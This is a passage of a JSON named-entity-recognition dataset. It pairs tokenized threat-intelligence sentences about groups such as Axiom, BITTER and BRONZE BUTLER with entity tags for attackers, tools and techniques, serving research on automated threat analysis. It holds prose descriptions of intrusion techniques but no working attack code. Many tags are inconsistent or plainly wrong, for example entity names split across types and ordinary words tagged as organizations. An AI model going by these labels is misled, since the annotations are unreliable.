"and", - "response", - "(EDR)", - "tools", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "used", - "native", - "OS", - "commands", - "to", - "understand", - "privilege", - "levels", - "and", - "system", - "details." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "attempted", - "to", - "discover", - "services", - "for", - "third", - "party", - "EDR", - "products." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "acquired", - "and", - "used", - "Cobalt", - "Strike", - "in", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "used", - "publicly", - "accessible", - "DNS", - "logging", - "services", - "to", - "identify", - "servers", - "vulnerable", - "to", - "Log4j", - "(CVE", - "2021-44228)." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Aquatic", - "Panda", - "has", - "attempted", - "and", - "failed", - "to", - "run", - "Bash", - "commands", - "on", - "a", - "Windows", - "host", - "by", - "passing", - "them", - "to", - "<code>cmd", - "/C</code>." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "actors", - "have", - "been", - "known", - "to", - "use", - "the", - "Sticky", - "Keys", - "replacement", - "within", - "RDP", - "sessions", - "to", - "obtain", - "persistence." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "compressed", - "and", - "encrypted", - "data", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "large", - "groups", - "of", - "compromised", - "machines", - "for", - "use", - "as", - "proxy", - "nodes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "acquired", - "dynamic", - "DNS", - "services", - "for", - "use", - "in", - "the", - "targeting", - "of", - "intended", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "collected", - "data", - "from", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "watering", - "hole", - "attacks", - "to", - "gain", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "been", - "observed", - "using", - "SQL", - "injection", - "to", - "gain", - "access", - "to", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "exploits", - "for", - "multiple", - "vulnerabilities", - "including", - "CVE-2014-0322,", - "CVE-2012-4792,", - "CVE-2012-1889,", - "and", - "CVE-2013-3893." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "been", - "known", - "to", - "dump", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "spear", - "phishing", - "to", - "initially", - "compromise", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "targeted", - "victims", - "with", - "remote", - "administration", - "tools", - "including", - "RDP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "RDP", - "during", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "steganography", - "to", - "hide", - "its", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "digital", - "certificates", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "previously", - "compromised", - "administrative", - "accounts", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Axiom", - "has", - "used", - "VPS", - "hosting", - "providers", - "in", - "targeting", - "of", - "intended", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Idus", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "registered", - "a", - "variety", - "of", - "domains", - "to", - "host", - "malicious", - "payloads", - "and", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "executed", - "OLE", - "objects", - "using", - "Microsoft", - "Equation", - "Editor", - "to", - "download", - "and", - "run", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "used", - "DDNS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "encrypted", - "their", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "used", - "a", - "RAR", - "SFX", - "dropper", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "exploited", - "Microsoft", - "Office", - "vulnerabilities", - "CVE-2012-0158,", - "CVE-2017-11882,", - "CVE-2018-0798,", - "and", - "CVE-2018-0802." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "exploited", - "CVE-2021-1732", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "downloaded", - "additional", - "malware", - "and", - "tools", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-OffAct", - "I-OffAct", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "opening", - "malicious", - "attachments", - "delivered", - "via", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "disguised", - "malware", - "as", - "a", - "Windows", - "Security", - "update", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "used", - "TCP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "used", - "scheduled", - "tasks", - "for", - "persistence", - "and", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "sent", - "spearphishing", - "emails", - "with", - "a", - "malicious", - "RTF", - "document", - "or", - "Excel", - "spreadsheet." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "obtained", - "tools", - "such", - "as", - "PuTTY", - "for", - "use", - "in", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "registered", - "domains", - "to", - "stage", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BITTER", - "has", - "used", - "HTTP", - "POST", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "compressed", - "data", - "into", - "password-protected", - "RAR", - "archives", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "at", - "to", - "register", - "a", - "scheduled", - "task", - "to", - "execute", - "malware", - "during", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "downloader", - "code", - "has", - "included", - "\"0\"", - "characters", - "at", - "the", - "end", - "of", - "the", - "file", - "to", - "inflate", - "the", - "file", - "size", - "in", - "a", - "likely", - "attempt", - "to", - "evade", - "anti-virus", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "a", - "Windows", - "10", - "specific", - "tool", - "and", - "xxmm", - "to", - "bypass", - "UAC", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "legitimate", - "applications", - "to", - "side-load", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "exfiltrated", - "files", - "stolen", - "from", - "local", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "exfiltrated", - "files", - "stolen", - "from", - "file", - "shares." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER's", - "MSGET", - "downloader", - "uses", - "a", - "dead", - "drop", - "resolver", - "to", - "access", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Way", - "B-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "downloads", - "encoded", - "payloads", - "and", - "decodes", - "them", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "incorporated", - "code", - "into", - "several", - "tools", - "that", - "attempts", - "to", - "terminate", - "anti-virus", - "processes." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "<code>net", - "user", - "/domain</code>", - "to", - "identify", - "account", - "information." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "compromised", - "three", - "Japanese", - "websites", - "using", - "a", - "Flash", - "exploit", - "to", - "perform", - "watering", - "hole", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "I-Exp", - "I-Exp", - "O", - "O", - "B-Org", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "exploited", - "Microsoft", - "Office", - "vulnerabilities", - "CVE-2014-4114,", - "CVE-2018-0802,", - "and", - "CVE-2018-0798", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "BRONZE", - "BUTLER", - "uploader", - "or", - "malware", - "the", - "uploader", - "uses", - "<code>command</code>", - "to", - "delete", - "the", - "RAR", - "archives", - "after", - "they", - "have", - "been", - "exfiltrated." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "collected", - "a", - "list", - "of", - "files", - "from", - "the", - "victim", - "and", - "uploaded", - "it", - "to", - "its", - "C2", - "server,", - "and", - "then", - "created", - "a", - "new", - "list", - "of", - "specific", - "files", - "to", - "steal." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "various", - "tools", - "to", - "download", - "files,", - "including", - "DGet", - "(a", - "similar", - "tool", - "to", - "wget)." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "various", - "tools", - "(such", - "as", - "Mimikatz", - "and", - "WCE)", - "to", - "perform", - "credential", - "dumping." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "attempted", - "to", - "get", - "users", - "to", - "launch", - "malicious", - "Microsoft", - "Word", - "attachments", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "masked", - "executables", - "with", - "document", - "file", - "icons", - "including", - "Word", - "and", - "Adobe", - "PDF." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "given", - "malware", - "the", - "same", - "name", - "as", - "an", - "existing", - "file", - "on", - "the", - "file", - "share", - "server", - "to", - "cause", - "users", - "to", - "unwittingly", - "launch", - "and", - "install", - "the", - "malware", - "on", - "additional", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "created", - "forged", - "Kerberos", - "Ticket", - "Granting", - "Ticket", - "(TGT)", - "and", - "Ticket", - "Granting", - "Service", - "(TGS)", - "tickets", - "to", - "maintain", - "administrative", - "access." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "made", - "use", - "of", - "Python-based", - "remote", - "access", - "tools." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "a", - "batch", - "script", - "that", - "adds", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "malware", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "typically", - "use", - "<code>ping</code>", - "and", - "Net", - "to", - "enumerate", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "Right-to-Left", - "Override", - "to", - "deceive", - "victims", - "into", - "executing", - "several", - "strains", - "of", - "malware." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Exp", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "schtasks", - "to", - "register", - "a", - "scheduled", - "task", - "to", - "execute", - "malware", - "during", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "a", - "tool", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "tools", - "to", - "enumerate", - "software", - "installed", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "used", - "spearphishing", - "emails", - "with", - "malicious", - "Microsoft", - "Word", - "attachments", - "to", - "infect", - "victims." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "BRONZE", - "BUTLER", - "tools", - "encode", - "data", - "with", - "base64", - "when", - "posting", - "it", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "steganography", - "in", - "multiple", - "operations", - "to", - "conceal", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "RC4", - "encryption", - "(for", - "Datper", - "malware)", - "and", - "AES", - "(for", - "xxmm", - "malware)", - "to", - "obfuscate", - "HTTP", - "traffic.", - "BRONZE", - "BUTLER", - "has", - "also", - "used", - "a", - "tool", - "called", - "RarStar", - "that", - "encodes", - "data", - "with", - "a", - "custom", - "XOR", - "algorithm", - "when", - "posting", - "it", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "TROJ_GETVERSION", - "to", - "discover", - "system", - "services." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "<code>net", - "time</code>", - "to", - "check", - "the", - "local", - "time", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "placed", - "malware", - "on", - "file", - "shares", - "and", - "given", - "it", - "the", - "same", - "name", - "as", - "legitimate", - "documents", - "on", - "the", - "share." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "obtained", - "and", - "used", - "open-source", - "tools", - "such", - "as", - "Mimikatz,", - "gsecdump,", - "and", - "Windows", - "Credential", - "Editor." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "VBS", - "and", - "VBE", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "malware", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "BRONZE", - "BUTLER", - "has", - "used", - "batch", - "scripts", - "and", - "the", - "command-line", - "interface", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "executed", - "DLL", - "search", - "order", - "hijacking." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "dropped", - "legitimate", - "software", - "onto", - "a", - "compromised", - "host", - "and", - "used", - "it", - "to", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "exploited", - "CVE-2020-5902,", - "an", - "F5", - "BIP-IP", - "vulnerability,", - "to", - "drop", - "a", - "Linux", - "backdoor.", - "BackdoorDiplomacy", - "has", - "also", - "exploited", - "mis-configured", - "Plesk", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "downloaded", - "additional", - "files", - "and", - "tools", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "copied", - "files", - "of", - "interest", - "to", - "the", - "main", - "drive's", - "recycle", - "bin." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "obtained", - "and", - "used", - "leaked", - "malware,", - "including", - "DoublePulsar,", - "EternalBlue,", - "EternalRocks,", - "and", - "EternalSynergy,", - "in", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "disguised", - "their", - "backdoor", - "droppers", - "with", - "naming", - "conventions", - "designed", - "to", - "blend", - "into", - "normal", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "dropped", - "implants", - "in", - "folders", - "named", - "for", - "legitimate", - "software." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "used", - "SMBTouch,", - "a", - "vulnerability", - "scanner,", - "to", - "determine", - "whether", - "a", - "target", - "is", - "vulnerable", - "to", - "EternalBlue", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "used", - "EarthWorm", - "for", - "network", - "tunneling", - "with", - "a", - "SOCKS5", - "server", - "and", - "port", - "transfer", - "functionalities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "obfuscated", - "tools", - "and", - "malware", - "it", - "uses", - "with", - "VMProtect." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "used", - "an", - "executable", - "to", - "detect", - "removable", - "media,", - "such", - "as", - "USB", - "flash", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "BackdoorDiplomacy", - "has", - "used", - "NetCat", - "and", - 